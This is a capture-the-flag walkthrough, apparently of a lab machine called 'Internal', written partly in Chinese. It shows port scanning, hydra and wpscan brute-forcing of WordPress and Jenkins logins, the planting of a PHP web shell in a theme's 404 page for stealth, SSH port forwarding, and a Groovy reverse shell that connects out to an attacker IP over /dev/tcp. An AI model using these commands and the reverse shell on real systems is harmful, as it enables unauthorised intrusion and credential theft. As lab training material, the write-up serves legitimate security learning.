# internal # Recon ``` script is running. Author:meowhecker Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-18 13:04 CST Nmap scan report for 10.10.175.229 Host is up (0.24s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6efaefbef65f98b9597bf78eb9c5621e (RSA) | 256 ed64ed33e5c93058ba23040d14eb30e9 (ECDSA) |_ 256 b07f7f7b5262622a60d43d36fa89eeff (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.29 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=2/18%OT=22%CT=1%CU=38783%PV=Y%DS=5%DC=T%G=Y%TM=63F0605 OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ OS:(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O OS:3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=F4B3%W2= OS:F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M505NNSN OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 5 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1720/tcp) HOP RTT ADDRESS 1 117.22 ms 10.17.0.1 2 ... 4 5 237.98 ms 10.10.175.229 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1046.65 seconds ``` ## Enumerate ``` ---- Scanning URL: http://10.10.175.229:80/ ---- ==> DIRECTORY: http://10.10.175.229:80/blog/ + http://10.10.175.229:80/index.html (CODE:200|SIZE:10918) ==> DIRECTORY: http://10.10.175.229:80/javascript/ ==> DIRECTORY: http://10.10.175.229:80/phpmyadmin/ + http://10.10.175.229:80/server-status (CODE:403|SIZE:278) ==> DIRECTORY: http://10.10.175.229:80/wordpress/ ``` --- ``` http://10.10.175.229:80/phpmyadmin/ php -> Database Manager ``` --- ## Potential Vulnerable point  ``` vim /etc/hosts <ip address> <--> <Domain Name> ```  http://internal.thm/blog/ Word press login Page  Testing ->123:123  Unknown username -> this message which can be used to find out the username Post Request ``` POST /blog/wp-login.php HTTP/1.1 Host: internal.thm User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://internal.thm/blog/wp-login.php Content-Type: application/x-www-form-urlencoded Content-Length: 106 Origin: http://internal.thm Connection: close Cookie: wordpress_test_cookie=WP+Cookie+check Upgrade-Insecure-Requests: 1 log=meow&pwd=meow&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1 ``` Testing UserName URL Path: /blog/wp-login.php Data : log=meow&pwd=meow&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1 Error Message : admin is incorrect ``` hydra -l admin -P wordlists/rockyou.txt internal.thm http-post-form "/blog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1:admin is incorrect" ``` ``` [80][http-post-form] host: internal.thm login: admin password: 123456 [80][http-post-form] host: internal.thm login: admin password: 12345 [80][http-post-form] host: internal.thm login: admin password: 12345678 [80][http-post-form] host: internal.thm login: admin password: babygirl [80][http-post-form] host: internal.thm login: admin password: password [80][http-post-form] host: internal.thm login: admin password: abc123 [80][http-post-form] host: internal.thm login: admin password: daniel [80][http-post-form] host: internal.thm login: admin password: 1234567 [80][http-post-form] host: internal.thm login: admin password: jessica [80][http-post-form] host: internal.thm login: admin password: rockyou [80][http-post-form] host: internal.thm login: admin password: iloveyou [80][http-post-form] host: internal.thm login: admin password: princess [80][http-post-form] host: internal.thm login: admin password: lovely [80][http-post-form] host: internal.thm login: admin password: 123456789 [80][http-post-form] host: internal.thm login: admin password: monkey [80][http-post-form] host: internal.thm login: admin password: nicole ``` 依照上面結果 Wordpress 可能沒辦法直接用hydra 取得 Initial Access 不過我們已經知道了 對方是使用 Wordpress (CMS) 來架站 就可以找掃 Wordpress tools 來針對他 https://github.com/wpscanteam/wpscan WordPress security scanner. InFo ``` wpscan --url internal.thm/wordpress/ --passwords wordlists/rockyou.txt --usernames admin --max-threads 50 ``` ``` WordPress version 5.4.2 identified WordPress theme in use: twentyseventeen ``` ``` Performing password attack on Xmlrpc against 1 user/s [SUCCESS] - admin / my2boys ```  ``` admin@internal.thm ``` ## 有個私人的 Article  ``` Will's credentials. william:arnold147 ```  ssh 失敗 phpadmin 也失敗 我叁考了別人的文章 [WordPress: Reverse Shell](https://www.hackingarticles.in/wordpress-reverse-shell/) 他提到了很一些方法可以在 wordpress 拿到Shell 其中一個方法是 Injecting Malicious code in WP_Theme   Upload the PHP shell   其實有更好的做法 是塞到 Not fund 404 中 因為能更加隱蔽 web shell ## Privilege 可以先找出 web configure file /var/www/wordpress  ``` /** MySQL database username */ define( 'DB_USER', 'wordpress' ); /** MySQL database password */ define( 'DB_PASSWORD', 'wordpress123' ); ``` ``` cat passwd | grep home syslog:x:102:106::/home/syslog:/usr/sbin/nologin aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash ``` aubreanna -> 有效用戶 收尋 有關 aubreanna 的files ``` grep -rni "aubreanna" / 2>/dev/null ``` /opt/wp-save.txt:3:Aubreanna needed these credentials for something later. Let her know you have them and where they are. /opt/wp-save.txt:5:aubreanna:bubb13guM!@#123 Attempt SSH login  如此 我們已經獲得普通用戶 Account info ``` aubreanna@internal:~$ cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080 ``` 172.17.0.2 -> 可以推知 Service 應該是跑在docker中 可以透過 ssh port forwarding 方法 在locaol access 172.17.0.2 的service   ``` ssh -N -L 4444:172.17.0.2:8080 aubreanna@10.10.17.163 ```  ``` POST /j_acegi_security_check HTTP/1.1 Host: 127.0.0.1:4444 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 56 Origin: http://127.0.0.1:4444 Connection: close Referer: http://127.0.0.1:4444/loginError Cookie: JSESSIONID.6126d275=node01k8mll4jgxgmq1mumpy1l10afa0.node0 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 j_username=admin&j_password=meow&from=%2F&Submit=Sign+in ``` Hydra login ``` hydra -l admin -P wordlists/rockyou.txt 127.0.0.1 -s 4444 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" ``` -s port number ``` [4444][http-post-form] host: 127.0.0.1 login: admin password: spongebob ``` Java Reverse shell (pentest monkey) ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.17.11.72/6666;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ```  ``` cat note.txt Aubreanna, Will wanted these credentials secured behind the Jenkins,container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123 ```